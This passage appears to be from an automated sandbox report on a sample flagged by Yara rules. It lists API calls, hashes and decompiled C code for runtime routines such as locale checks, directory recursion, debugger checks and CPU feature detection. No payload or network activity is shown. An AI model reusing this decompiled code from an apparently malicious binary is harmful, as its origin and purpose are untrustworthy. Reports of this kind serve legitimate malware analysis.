                                                    • Part of subcall function 00AFC713: SetLastError.KERNEL32(00000000,00000006,000000FF), ref: 00AFC7BB
                                                    • Part of subcall function 00AFC713: _free.LIBCMT ref: 00AFC76E
                                                    • Part of subcall function 00AFC713: _free.LIBCMT ref: 00AFC817
                                                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 00B06160
                                                  • IsValidCodePage.KERNEL32(00000000), ref: 00B061BB
                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00B061CA
                                                  • GetLocaleInfoW.KERNEL32(?,00001001,00AF335D,00000040,?,00AF347D,00000055,00000000,?,?,00000055,00000000), ref: 00B06212
                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00AF33DD,00000040), ref: 00B06231
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                  • String ID:
                                                  • API String ID: 949163717-0
                                                  • Opcode ID: faad368ba3f77ddeb0b9476f26febbae7a7af9328e0d87968327093a24fb89bf
                                                  • Instruction ID: 69a4612abccc46e19aa8d4e2360cd3d62a6f121052903c48e85484c832e1281d
                                                  • Opcode Fuzzy Hash: faad368ba3f77ddeb0b9476f26febbae7a7af9328e0d87968327093a24fb89bf
                                                  • Instruction Fuzzy Hash: 85516F71A0060AAFDF20DFA5CC85ABB7BF8EF08700F1445A9F915E71D1EB709A548B61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B01BA6, Relevance: 4.6, APIs: 3, Instructions: 139fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 00B01C53
                                                  • FindClose.KERNEL32(00000000), ref: 00B01C7A
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00B01CEB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstNext
                                                  • String ID:
                                                  • API String ID: 3541575487-0
                                                  • Opcode ID: b9853a7735c46ca293b27438caf69eec7dd65462f68586c842541f0861d53a6f
                                                  • Instruction ID: eb5a3938b5c3f2d3e0def863ee363496e1e75a1a65dfc7eefa8766f07652d33c
                                                  • Opcode Fuzzy Hash: b9853a7735c46ca293b27438caf69eec7dd65462f68586c842541f0861d53a6f
                                                  • Instruction Fuzzy Hash: 7841C6719001156ADB38EF6DDD89DABBBF8EB85314F4489D9F809971C1EA30DE80CA60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040446F, Relevance: 4.6, APIs: 3, Instructions: 78COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 74%
                                                  			E0040446F(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				char* _t49;
				long _t57;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t64;
				intOrPtr _t65;
				int _t66;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t64 = __edx;
				_t59 = __ebx;
				_t40 =  *0x412014; // 0x9e6834eb
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				_push(_t65);
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00401E6A(_t41);
					_pop(_t60);
				}
				E00402460(_t65,  &_v804, 0, 0x50);
				E00402460(_t65,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t60;
				_v556 = _t64;
				_v560 = _t59;
				_v564 = _t68;
				_v568 = _t65;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t66 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t57 = UnhandledExceptionFilter( &_v812);
				if(_t57 == 0 && _t66 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E00401E6A(_t57);
				}
				E004018CC();
				return _t57;
			}






































                                                  0x0040446f
                                                  0x0040446f
                                                  0x0040446f
                                                  0x0040447a
                                                  0x0040447f
                                                  0x00404481
                                                  0x00404488
                                                  0x00404489
                                                  0x0040448b
                                                  0x0040448e
                                                  0x00404493
                                                  0x00404493
                                                  0x0040449f
                                                  0x004044b2
                                                  0x004044c0
                                                  0x004044c6
                                                  0x004044cc
                                                  0x004044d2
                                                  0x004044d8
                                                  0x004044de
                                                  0x004044e4
                                                  0x004044ea
                                                  0x004044f0
                                                  0x004044f6
                                                  0x004044fd
                                                  0x00404504
                                                  0x0040450b
                                                  0x00404512
                                                  0x00404519
                                                  0x00404520
                                                  0x00404521
                                                  0x0040452a
                                                  0x00404530
                                                  0x00404533
                                                  0x00404539
                                                  0x00404546
                                                  0x0040454f
                                                  0x00404558
                                                  0x00404561
                                                  0x0040456f
                                                  0x00404571
                                                  0x0040457e
                                                  0x00404586
                                                  0x00404592
                                                  0x00404595
                                                  0x0040459a
                                                  0x004045a1
                                                  0x004045a9

                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32 ref: 00404567
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00404571
                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 0040457E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                  • String ID:
                                                  • API String ID: 3906539128-0
                                                  • Opcode ID: 2402715568fd3a7f033aea0833c586b82d8bbb398bbe1fad897268afcc2e17dd
                                                  • Instruction ID: 1195a769eb9e4d04bd79abb1e2ff1cfbb043d98aa737aaf25acc392e7af51fe4
                                                  • Opcode Fuzzy Hash: 2402715568fd3a7f033aea0833c586b82d8bbb398bbe1fad897268afcc2e17dd
                                                  • Instruction Fuzzy Hash: 5931C674901218EBCB21DF64DD8878DB7B4BF48310F5042EAE50CA7290E7749F858F49
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF66D3, Relevance: 4.6, APIs: 3, Instructions: 78COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00AF67CB
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00AF67D5
                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00AF67E2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                  • String ID:
                                                  • API String ID: 3906539128-0
                                                  • Opcode ID: 0d27242a92abc5de0c92caf215db446740dd893ab09e3ad39eb770d92e97c8fd
                                                  • Instruction ID: b1cbc688751832f9b93167f9044eae608ce1140ba0a63455effe0a7b57fcb25b
                                                  • Opcode Fuzzy Hash: 0d27242a92abc5de0c92caf215db446740dd893ab09e3ad39eb770d92e97c8fd
                                                  • Instruction Fuzzy Hash: A331C67490121DABCB21DF68DD89BDDB7B8AF08310F5041EAE81CA7250EB749F858F54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004035F1, Relevance: 4.5, APIs: 3, Instructions: 20COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004035F1(int _a4) {
				void* _t14;

				if(E00405A93(_t14) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E00403632(_t14, _a4);
				ExitProcess(_a4);
			}




                                                  0x004035fd
                                                  0x00403619
                                                  0x00403619
                                                  0x00403622
                                                  0x0040362b

                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000,?,00403ECD,00000003), ref: 00403612
                                                  • TerminateProcess.KERNEL32(00000000,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000,?,00403ECD,00000003), ref: 00403619
                                                  • ExitProcess.KERNEL32 ref: 0040362B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CurrentExitTerminate
                                                  • String ID:
                                                  • API String ID: 1703294689-0
                                                  • Opcode ID: 0172ae19e4532c11ae0ed1487fed2bd1e0a429119bbb2948d606f4d75f20fe07
                                                  • Instruction ID: bfe7cab4a8d0116fd485a211d40daa1066cad8d05f2417ef62f302f9e127dae3
                                                  • Opcode Fuzzy Hash: 0172ae19e4532c11ae0ed1487fed2bd1e0a429119bbb2948d606f4d75f20fe07
                                                  • Instruction Fuzzy Hash: D9E0BF31000544EBCF216FA5DD499493F69EB80346F048A35FD45AB261CB3ADD56DA58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AD9077, Relevance: 4.5, APIs: 3, Instructions: 20COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(?,?,00AD9076,?,?,?,?), ref: 00AD9099
                                                  • TerminateProcess.KERNEL32(00000000,?,00AD9076,?,?,?,?), ref: 00AD90A0
                                                  • ExitProcess.KERNEL32 ref: 00AD90B2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Process$CurrentExitTerminate
                                                  • String ID:
                                                  • API String ID: 1703294689-0
                                                  • Opcode ID: 11c3bb4160e68bbc2ba2f967114705524267f9895ee86c4cfe9ab8c9ffaa6e4b
                                                  • Instruction ID: f59dc8e801f583d4937a932ecf0e8679bb0e41aeeefa818731e8da8614688aa6
                                                  • Opcode Fuzzy Hash: 11c3bb4160e68bbc2ba2f967114705524267f9895ee86c4cfe9ab8c9ffaa6e4b
                                                  • Instruction Fuzzy Hash: 70E0B631410148AFCF216F65ED1DE993B69FB45741F418415F90697631CF36DD52CA80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B018BD, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 164COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .
                                                  • API String ID: 0-248832578
                                                  • Opcode ID: 1fb02fc737e0fc0e86348d9a872509561cde7f70dcd79521e0a60ed3b0695828
                                                  • Instruction ID: bd6055a20e68c41588d3a54bc50ffd6dbeaf98b3df0ae8e482537dd635780739
                                                  • Opcode Fuzzy Hash: 1fb02fc737e0fc0e86348d9a872509561cde7f70dcd79521e0a60ed3b0695828
                                                  • Instruction Fuzzy Hash: 0F413575900209AFDB28DEACCC95EFB7BADEF85344F1445DCF91987281E631AE418B90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040208D, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 86%
                                                  			E0040208D(intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _t59;
				signed int _t62;
				signed int _t63;
				intOrPtr _t65;
				signed int _t66;
				signed int _t68;
				intOrPtr _t73;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t84;
				intOrPtr* _t86;
				signed int _t91;
				signed int _t94;

				_t84 = __edx;
				 *0x412b2c =  *0x412b2c & 0x00000000;
				 *0x412030 =  *0x412030 | 1;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L20:
					return 0;
				}
				_v24 = _v24 & 0x00000000;
				 *0x412030 =  *0x412030 | 0x00000002;
				 *0x412b2c = 1;
				_t86 =  &_v48;
				_push(1);
				asm("cpuid");
				_pop(_t73);
				 *_t86 = 0;
				 *((intOrPtr*)(_t86 + 4)) = 1;
				 *((intOrPtr*)(_t86 + 8)) = 0;
				 *((intOrPtr*)(_t86 + 0xc)) = _t84;
				_v16 = _v48;
				_v8 = _v36 ^ 0x49656e69;
				_v12 = _v40 ^ 0x6c65746e;
				_push(1);
				asm("cpuid");
				_t75 =  &_v48;
				 *_t75 = 1;
				 *((intOrPtr*)(_t75 + 4)) = _t73;
				 *((intOrPtr*)(_t75 + 8)) = 0;
				 *((intOrPtr*)(_t75 + 0xc)) = _t84;
				if((_v44 ^ 0x756e6547 | _v8 | _v12) != 0) {
					L9:
					_t91 =  *0x412b30; // 0x2
					L10:
					_v32 = _v36;
					_t59 = _v40;
					_v8 = _t59;
					_v28 = _t59;
					if(_v16 >= 7) {
						_t65 = 7;
						_push(_t75);
						asm("cpuid");
						_t77 =  &_v48;
						 *_t77 = _t65;
						 *((intOrPtr*)(_t77 + 4)) = _t75;
						 *((intOrPtr*)(_t77 + 8)) = 0;
						 *((intOrPtr*)(_t77 + 0xc)) = _t84;
						_t66 = _v44;
						_v24 = _t66;
						_t59 = _v8;
						if((_t66 & 0x00000200) != 0) {
							 *0x412b30 = _t91 | 0x00000002;
						}
					}
					if((_t59 & 0x00100000) != 0) {
						 *0x412030 =  *0x412030 | 0x00000004;
						 *0x412b2c = 2;
						if((_t59 & 0x08000000) != 0 && (_t59 & 0x10000000) != 0) {
							asm("xgetbv");
							_v20 = _t59;
							_v16 = _t84;
							if((_v20 & 0x00000006) == 6 && 0 == 0) {
								_t62 =  *0x412030; // 0x2f
								_t63 = _t62 | 0x00000008;
								 *0x412b2c = 3;
								 *0x412030 = _t63;
								if((_v24 & 0x00000020) != 0) {
									 *0x412b2c = 5;
									 *0x412030 = _t63 | 0x00000020;
								}
							}
						}
					}
					goto L20;
				}
				_t68 = _v48 & 0x0fff3ff0;
				if(_t68 == 0x106c0 || _t68 == 0x20660 || _t68 == 0x20670 || _t68 == 0x30650 || _t68 == 0x30660 || _t68 == 0x30670) {
					_t94 =  *0x412b30; // 0x2
					_t91 = _t94 | 0x00000001;
					 *0x412b30 = _t91;
					goto L10;
				} else {
					goto L9;
				}
			}



























                                                  0x0040208d
                                                  0x00402090
                                                  0x0040209e
                                                  0x004020ad
                                                  0x0040222a
                                                  0x00402230
                                                  0x00402230
                                                  0x004020b3
                                                  0x004020b9
                                                  0x004020c4
                                                  0x004020ca
                                                  0x004020cd
                                                  0x004020ce
                                                  0x004020d2
                                                  0x004020d3
                                                  0x004020d5
                                                  0x004020d8
                                                  0x004020dd
                                                  0x004020e6
                                                  0x004020f7
                                                  0x00402102
                                                  0x00402108
                                                  0x00402109
                                                  0x00402111
                                                  0x00402117
                                                  0x00402119
                                                  0x0040211c
                                                  0x0040211f
                                                  0x00402122
                                                  0x00402167
                                                  0x00402167
                                                  0x0040216d
                                                  0x00402174
                                                  0x00402177
                                                  0x0040217a
                                                  0x0040217d
                                                  0x00402180
                                                  0x00402184
                                                  0x00402187
                                                  0x00402188
                                                  0x0040218d
                                                  0x00402190
                                                  0x00402192
                                                  0x00402195
                                                  0x00402198
                                                  0x0040219b
                                                  0x004021a3
                                                  0x004021a6
                                                  0x004021a9
                                                  0x004021ae
                                                  0x004021ae
                                                  0x004021a9
                                                  0x004021bb
                                                  0x004021bd
                                                  0x004021c4
                                                  0x004021d3
                                                  0x004021de
                                                  0x004021e1
                                                  0x004021e4
                                                  0x004021f5
                                                  0x004021fb
                                                  0x00402200
                                                  0x00402203
                                                  0x00402211
                                                  0x00402216
                                                  0x0040221b
                                                  0x00402225
                                                  0x00402225
                                                  0x00402216
                                                  0x004021f5
                                                  0x004021d3
                                                  0x00000000
                                                  0x004021bb
                                                  0x00402127
                                                  0x00402131
                                                  0x00402156
                                                  0x0040215c
                                                  0x0040215f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000

                                                  APIs
                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 004020A6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FeaturePresentProcessor
                                                  • String ID:
                                                  • API String ID: 2325560087-3916222277
                                                  • Opcode ID: 81a6643d8d766bf2a1e14be1042f56af57549ae9e9951545f306693b5f2864aa
                                                  • Instruction ID: 00a0b3a4e6e1703bd72bf57860e68eebd2cbb95fa7def28fde3004e4e54fdf29
                                                  • Opcode Fuzzy Hash: 81a6643d8d766bf2a1e14be1042f56af57549ae9e9951545f306693b5f2864aa
                                                  • Instruction Fuzzy Hash: 02515AB19102099BDB15CFA9DA8979ABBF4FB08314F14C57AD804EB390D3B8A915CF58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00404A29, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 54%
                                                  			E00404A29(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v28;
				signed int _v32;
				WCHAR* _v36;
				signed int _v48;
				intOrPtr _v556;
				intOrPtr _v558;
				char _v560;
				void _v604;
				intOrPtr* _v608;
				signed int _v612;
				signed int _v616;
				intOrPtr _v644;
				intOrPtr _v648;
				void* __edi;
				signed int _t40;
				signed int _t45;
				signed int _t48;
				signed int _t50;
				signed int _t51;
				signed char _t53;
				signed int _t62;
				void* _t64;
				union _FINDEX_INFO_LEVELS _t66;
				union _FINDEX_INFO_LEVELS _t67;
				signed int _t70;
				intOrPtr* _t71;
				signed int _t74;
				void* _t80;
				void* _t82;
				signed int _t83;
				void* _t87;
				WCHAR* _t88;
				intOrPtr* _t92;
				intOrPtr _t95;
				void* _t97;
				signed int _t98;
				intOrPtr* _t102;
				signed int _t105;
				void* _t108;
				intOrPtr _t109;
				void* _t110;
				void* _t112;
				void* _t113;
				signed int _t115;
				void* _t116;
				union _FINDEX_INFO_LEVELS _t117;
				void* _t121;
				void* _t122;
				void* _t123;
				signed int _t124;
				void* _t125;
				signed int _t130;
				void* _t131;
				signed int _t132;
				void* _t133;
				void* _t134;

				_push(__ecx);
				_t92 = _a4;
				_t2 = _t92 + 2; // 0x2
				_t108 = _t2;
				do {
					_t40 =  *_t92;
					_t92 = _t92 + 2;
				} while (_t40 != 0);
				_t115 = _a12;
				_t95 = (_t92 - _t108 >> 1) + 1;
				_v8 = _t95;
				if(_t95 <= (_t40 | 0xffffffff) - _t115) {
					_t5 = _t115 + 1; // 0x1
					_t87 = _t5 + _t95;
					_t122 = E00403ECE(_t95, _t87, 2);
					_t97 = _t121;
					__eflags = _t115;
					if(_t115 == 0) {
						L6:
						_push(_v8);
						_t87 = _t87 - _t115;
						_t45 = E004047AD(_t97, _t122 + _t115 * 2, _t87, _a4);
						_t132 = _t131 + 0x10;
						__eflags = _t45;
						if(__eflags != 0) {
							goto L9;
						} else {
							_t80 = E00404CA2(_a16, __eflags, _t122);
							E00403E03(0);
							_t82 = _t80;
							goto L8;
						}
					} else {
						_push(_t115);
						_t83 = E004047AD(_t97, _t122, _t87, _a8);
						_t132 = _t131 + 0x10;
						__eflags = _t83;
						if(_t83 != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00404649();
							asm("int3");
							_t130 = _t132;
							_t133 = _t132 - 0x260;
							_t48 =  *0x412014; // 0x9e6834eb
							_v48 = _t48 ^ _t130;
							_t109 = _v28;
							_t98 = _v32;
							_push(_t87);
							_t88 = _v36;
							_push(_t122);
							_push(_t115);
							_t123 = 0x5c;
							_v644 = _t109;
							_v648 = 0x2f;
							_t116 = 0x3a;
							while(1) {
								__eflags = _t98 - _t88;
								if(_t98 == _t88) {
									break;
								}
								_t50 =  *_t98 & 0x0000ffff;
								__eflags = _t50 - _v612;
								if(_t50 != _v612) {
									__eflags = _t50 - _t123;
									if(_t50 != _t123) {
										__eflags = _t50 - _t116;
										if(_t50 != _t116) {
											_t98 = _t98 - 2;
											__eflags = _t98;
											continue;
										}
									}
								}
								break;
							}
							_t124 =  *_t98 & 0x0000ffff;
							__eflags = _t124 - _t116;
							if(_t124 != _t116) {
								L19:
								_t51 = _t124;
								_t117 = 0;
								_t110 = 0x2f;
								__eflags = _t51 - _t110;
								if(_t51 == _t110) {
									L23:
									_t53 = 1;
									__eflags = 1;
								} else {
									_t112 = 0x5c;
									__eflags = _t51 - _t112;
									if(_t51 == _t112) {
										goto L23;
									} else {
										_t113 = 0x3a;
										__eflags = _t51 - _t113;
										if(_t51 == _t113) {
											goto L23;
										} else {
											_t53 = 0;
										}
									}
								}
								_t101 = (_t98 - _t88 >> 1) + 1;
								asm("sbb eax, eax");
								_v612 =  ~(_t53 & 0x000000ff) & (_t98 - _t88 >> 0x00000001) + 0x00000001;
								E00402460(_t117,  &_v604, _t117, 0x250);
								_t134 = _t133 + 0xc;
								_t125 = FindFirstFileExW(_t88, _t117,  &_v604, _t117, _t117, _t117);
								__eflags = _t125 - 0xffffffff;
								if(_t125 != 0xffffffff) {
									_t102 = _v608;
									_t62 =  *((intOrPtr*)(_t102 + 4)) -  *_t102;
									__eflags = _t62;
									_v616 = _t62 >> 2;
									_t64 = 0x2e;
									do {
										__eflags = _v560 - _t64;
										if(_v560 != _t64) {
											L36:
											_push(_t102);
											_t66 = E00404A29(_t102,  &_v560, _t88, _v612);
											_t134 = _t134 + 0x10;
											__eflags = _t66;
											if(_t66 != 0) {
												goto L26;
											} else {
												goto L37;
											}
										} else {
											__eflags = _v558 - _t117;
											if(_v558 == _t117) {
												goto L37;
											} else {
												__eflags = _v558 - _t64;
												if(_v558 != _t64) {
													goto L36;
												} else {
													__eflags = _v556 - _t117;
													if(_v556 == _t117) {
														goto L37;
													} else {
														goto L36;
													}
												}
											}
										}
										goto L40;
										L37:
										_t70 =  *0x40c0f8(_t125,  &_v604);
										_t102 = _v608;
										__eflags = _t70;
										_t64 = 0x2e;
									} while (_t70 != 0);
									_t71 = _t102;
									_t105 = _v616;
									_t111 =  *_t71;
									_t74 =  *((intOrPtr*)(_t71 + 4)) -  *_t71 >> 2;
									__eflags = _t105 - _t74;
									if(_t105 != _t74) {
										E004074E0(_t111 + _t105 * 4, _t74 - _t105, 4, E00404844);
									}
								} else {
									_push(_v608);
									_t66 = E00404A29(_t101, _t88, _t117, _t117);
									L26:
									_t117 = _t66;
								}
								__eflags = _t125 - 0xffffffff;
								if(_t125 != 0xffffffff) {
									 *0x40c0f0(_t125);
								}
								_t67 = _t117;
							} else {
								__eflags = _t98 -  &(_t88[1]);
								if(_t98 ==  &(_t88[1])) {
									goto L19;
								} else {
									_push(_t109);
									_t67 = E00404A29(_t98, _t88, 0, 0);
								}
							}
							__eflags = _v12 ^ _t130;
							E004018CC();
							return _t67;
						} else {
							goto L6;
						}
					}
				} else {
					_t82 = 0xc;
					L8:
					return _t82;
				}
				L40:
			}





























































                                                  0x00404a2e
                                                  0x00404a2f
                                                  0x00404a36
                                                  0x00404a36
                                                  0x00404a39
                                                  0x00404a39
                                                  0x00404a3c
                                                  0x00404a3f
                                                  0x00404a44
                                                  0x00404a4e
                                                  0x00404a51
                                                  0x00404a56
                                                  0x00404a5e
                                                  0x00404a61
                                                  0x00404a6b
                                                  0x00404a6e
                                                  0x00404a6f
                                                  0x00404a71
                                                  0x00404a85
                                                  0x00404a85
                                                  0x00404a88
                                                  0x00404a92
                                                  0x00404a97
                                                  0x00404a9a
                                                  0x00404a9c
                                                  0x00000000
                                                  0x00404a9e
                                                  0x00404aa2
                                                  0x00404aab
                                                  0x00404ab1
                                                  0x00000000
                                                  0x00404ab3
                                                  0x00404a73
                                                  0x00404a73
                                                  0x00404a79
                                                  0x00404a7e
                                                  0x00404a81
                                                  0x00404a83
                                                  0x00404aba
                                                  0x00404abc
                                                  0x00404abd
                                                  0x00404abe
                                                  0x00404abf
                                                  0x00404ac0
                                                  0x00404ac1
                                                  0x00404ac6
                                                  0x00404aca
                                                  0x00404acc
                                                  0x00404ad2
                                                  0x00404ad9
                                                  0x00404adc
                                                  0x00404adf
                                                  0x00404ae2
                                                  0x00404ae3
                                                  0x00404ae6
                                                  0x00404ae7
                                                  0x00404aea
                                                  0x00404aed
                                                  0x00404af3
                                                  0x00404afd
                                                  0x00404b19
                                                  0x00404b19
                                                  0x00404b1b
                                                  0x00000000
                                                  0x00000000
                                                  0x00404b00
                                                  0x00404b03
                                                  0x00404b0a
                                                  0x00404b0c
                                                  0x00404b0f
                                                  0x00404b11
                                                  0x00404b14
                                                  0x00404b16
                                                  0x00404b16
                                                  0x00000000
                                                  0x00404b16
                                                  0x00404b14
                                                  0x00404b0f
                                                  0x00000000
                                                  0x00404b0a
                                                  0x00404b1d
                                                  0x00404b20
                                                  0x00404b23
                                                  0x00404b3f
                                                  0x00404b41
                                                  0x00404b43
                                                  0x00404b45
                                                  0x00404b46
                                                  0x00404b49
                                                  0x00404b5f
                                                  0x00404b61
                                                  0x00404b61
                                                  0x00404b4b
                                                  0x00404b4d
                                                  0x00404b4e
                                                  0x00404b51
                                                  0x00000000
                                                  0x00404b53
                                                  0x00404b55
                                                  0x00404b56
                                                  0x00404b59
                                                  0x00000000
                                                  0x00404b5b
                                                  0x00404b5b
                                                  0x00404b5b
                                                  0x00404b59
                                                  0x00404b51
                                                  0x00404b69
                                                  0x00404b71
                                                  0x00404b75
                                                  0x00404b83
                                                  0x00404b88
                                                  0x00404b9d
                                                  0x00404b9f
                                                  0x00404ba2
                                                  0x00404bd7
                                                  0x00404be2
                                                  0x00404be2
                                                  0x00404be7
                                                  0x00404bed
                                                  0x00404bee
                                                  0x00404bee
                                                  0x00404bf5
                                                  0x00404c12
                                                  0x00404c12
                                                  0x00404c21
                                                  0x00404c26
                                                  0x00404c29
                                                  0x00404c2b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00404bf7
                                                  0x00404bf7
                                                  0x00404bfe
                                                  0x00000000
                                                  0x00404c00
                                                  0x00404c00
                                                  0x00404c07
                                                  0x00000000
                                                  0x00404c09
                                                  0x00404c09
                                                  0x00404c10
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00404c10
                                                  0x00404c07
                                                  0x00404bfe
                                                  0x00000000
                                                  0x00404c2d
                                                  0x00404c35
                                                  0x00404c3b
                                                  0x00404c41
